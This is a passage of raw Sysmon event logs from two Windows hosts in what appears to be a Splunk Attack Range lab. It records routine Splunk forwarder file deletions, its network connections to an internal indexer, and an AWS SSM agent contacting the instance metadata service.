Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:21.104{C8EA50B7-1A19-6216-7C07-000000003802}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:22.791{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AEC8E145869BCBA01CD356358855004,SHA256=E20FB903AC2A4720609C51291CB3EB42E53B23D898FFA9D500708CF4CD50CD69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223203Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:22.283{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4BF6FCC076DBF8E75F68DCD0DABD7B1,SHA256=16B8451D4070AF292BC239F83E6C75CB966C47B42DE7FCD0566A260C79394AE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:23.795{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0997C1F7D3A39848AC81DBC43414742,SHA256=9DDC195BFFB33FB5F4673D6703BEABEBF5169A98715996574FB0E77FE2B2387D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223204Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:23.330{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=348D5598C8EA97161B8F2E51F514EAB1,SHA256=76027B7C6F8F3FB1F7C09D8983572537BE69D49E10EDA0C153AFE4C02FC60D7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:24.813{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D505ED8F29966567CFCD4AB71F6B5B81,SHA256=1D752ED120F32B48525D668F75BED959248C7F0C011A21AD08ED0FF8C23420D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223205Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:24.361{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=278F4A6EB95FA3152A910F9582551DD5,SHA256=09956910570346355D004A6A2CCA2CBDB98C279A2E156945C9484679BEE1C07B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:25.830{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3393D596328A89C7AFA60FD2BE2EEEC3,SHA256=2BFD06BD99B6F7C153382ACDED3A0BD49343E2F6B8EEB2ED5243D65F87F96935,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223207Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:22.505{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51770-false10.0.1.12-8000- 23542300x8000000000000000223206Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:25.408{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5F8E5CA006D03971D847A28EFD483FB,SHA256=5E35A916A5F52B88C4A53167BFD2E2EF408C0B5B481F5948A2252C9411D4A3D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:23.557{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49607-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:26.830{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32FB14A7A1758AC58DE8B12FABE09EC4,SHA256=3BF3B04DB622AEA37D7E14BEB078AE2E5AA9EF0FE32F91D9B6D06E8CCF023080,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223208Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:26.408{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCB081EFFC7EC204722864660C7EC679,SHA256=F741016749F4B1E1A54E0D5AB182D9C311F2BACEEE6B9CC2791C55B09BA61EA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:27.865{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C321DEEC042921440B490F25C77613A,SHA256=6FA9E3AA6CB8EA3CBC1BD382945562C1A256B27479DA3027A562EC2497F3BF51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223209Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:27.423{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=431052E0E352BB8748B16D658CDA6409,SHA256=3E3720AD6A27E4B110D5AA5E7D0C63E804EDFE229B630E10679CB9130126B3F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:28.881{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAE8D95359484C48567C549F6BD6222E,SHA256=2FF2F5E05E17755C5575821BE4F0B516A57F8191243361DBC8587DB0849D0E7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223210Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:28.439{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6DD2366D62CAF39316DAF020EFF217B,SHA256=E6A5E586F408A5BDAB467EDB50321577581B71130A827E3AAEEB4C3175433886,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:29.906{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B84724DB5D5314AAD329F06CA17B196,SHA256=C6840334B458CDED1562C707F7589EB540CF71847B283624F19471218F34BB15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223211Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:29.454{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE950A61A4D9101A0E13950C93A107D0,SHA256=7FC181F7E97926ED71D8E6803B3BD8B9DC2FFA59E786318225B40666952378CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:30.921{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DE0A7DE8CBFEF5706F346B7EE04B976,SHA256=8C397A22A6C5E79F01AF034B6B07E2A995E19D2B7A2856318F9D5BA2DF7A58D2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223214Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:27.614{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51771-false10.0.1.12-8000- 23542300x8000000000000000223213Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:30.517{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=9D74A79D942EA91764316E4F96DCA6EA,SHA256=63BBB90BF1421D67C3D2DA6104EFB1FFB1BDF1FDA8826520F65D30B976837B37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223212Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:30.470{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9083C90F3919C7B28205EFF5D3858642,SHA256=DCE660DE027F366DA42D8342CDD1E836BDABD564394A2B0CE3EDF4B80DDB1503,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:31.960{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=901EE5E453B56570BC31F735297D9D7A,SHA256=B37A375DCB25AF600DE8AE09A8C008A91520AD1E8DAEE20985CC591F7F197E0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223215Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:31.470{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43868ED34A81C9537B7E8ED1E9965824,SHA256=659203AB72FC5E87F6BF63E9D7DBA43A74801D644A053D6A8532B6C09FB9A42F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:29.567{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49608-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:32.977{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40E0F06F5A62451E87D4F71C43A97414,SHA256=DE260CD0A558D69D27A63ECA8591E29FC4C97641769B55FDB76D200AB5F2D696,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223216Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:32.486{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15685DEB7ECF1FB4318A986C4A5A9F3A,SHA256=3DABBA8E9DE4805FFCF56F5B6D12FB6B4BFB3D8C3453194031F7793A8A154E47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:33.978{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30013CC7096386B6FE1F3B243E048D9B,SHA256=BAE0009E3D4147A51413689267FEB65E857574988C4BF44E65E04AC418D50069,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223217Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:33.501{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49CB32DCAA222EBB50790B902927C0B9,SHA256=F2C5FBBA8E8E58C6292FB84F81192966ABDD5CEEFCAB3ABD494E69DB6FF5C73C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:33.677{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=7A037C8F7F5C9F2E322FD3BD08BFEC98,SHA256=D11887C4AAE59CC96705E8135051B48CF77EF9F65531AD4A23ED3DCFAFA8BF54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:34.985{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67D1F6F6162928D4EF68E7F600BBE23F,SHA256=093273163C55F8337E16329BEBD7768A1F3CE82F63D9AF3244C68B25FC7C23A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223220Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:33.140{4F8D34B0-F120-6215-3B00-000000003902}2612C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51773-false169.254.169.254-80http 354300x8000000000000000223219Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:33.139{4F8D34B0-F120-6215-3B00-000000003902}2612C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51772-false169.254.169.254-80http 23542300x8000000000000000223218Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:34.515{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F41307BF67E85DA11F9768B19C3EFEC1,SHA256=98D12AD5570CDF4BD15DB2108AACE889FCED895822DCB4784F1C403DCC8FBA02,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223222Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:33.550{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51774-false10.0.1.12-8000- 23542300x8000000000000000223221Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:35.515{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8846CC23CBB7AA9DDB1F9371022B45D7,SHA256=55E911C8B1BE79E611B792DE5137C3FF332DCC4E4F9FC00A4656D6A6F7B10E2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223223Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:36.530{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33EB921CD260F2415E957007A5D56C3F,SHA256=A63DC87191834D3BEEBB89B2461C2658A0044D985EFB2B81F7284FFD387E0794,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:36.016{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4B191A0D19C3921B3EA8C557D9E1D45,SHA256=E5EF696815D5D58536E1BC96CB1CA90EAF6EDCBF3D34CD0DF00E3720B90EF439,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223224Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:37.546{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=957CD0AD057A3245F50FF80A33CE05BD,SHA256=44737E380E24C70062ABAE6951742FFCD5870555D0009273DA0000175E730F79,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:35.509{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49609-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:37.017{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79431CDA3AE81E10B9D821083733DBFA,SHA256=ECE39E82613614B007B31FCB16E3109B66485CCAF1B2E93BC7B9526BC8CCA386,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223225Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:38.546{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60237D722F4AB49EA84C937FE231E993,SHA256=FDE8417E6B8FF0210A76900980DDA34CF08E8D4B2957B08BC2C73851688994F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:38.042{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DF09B69851A245E78850EE8E98BE3BF,SHA256=8DF93F1C17A3D4DE84DBB1DBB6D4B6026A771ECFA2B5474BD953C1EE461DAC45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223226Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:39.561{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94B8669B719CC3D265E350CC7EE48D61,SHA256=3BB3063C6319B8173096AC6914EE8FFCBF37871515FBCD46F27CA9F8D6E34531,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:39.059{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDBA240AF7E5DBAA29ADF0AEBFF22AB6,SHA256=2EC407DDD6A5415E0D093A148D79A14F9A8E88A2764BDABE1377131149EFD362,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223227Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:40.577{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7A1BDCF232A14720F602EDE1BEFC1F5,SHA256=E15D03187E32E921E71C9007C0ADB57DBCC000C734EC810B250C9F4DED223E3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:40.766{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:40.065{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 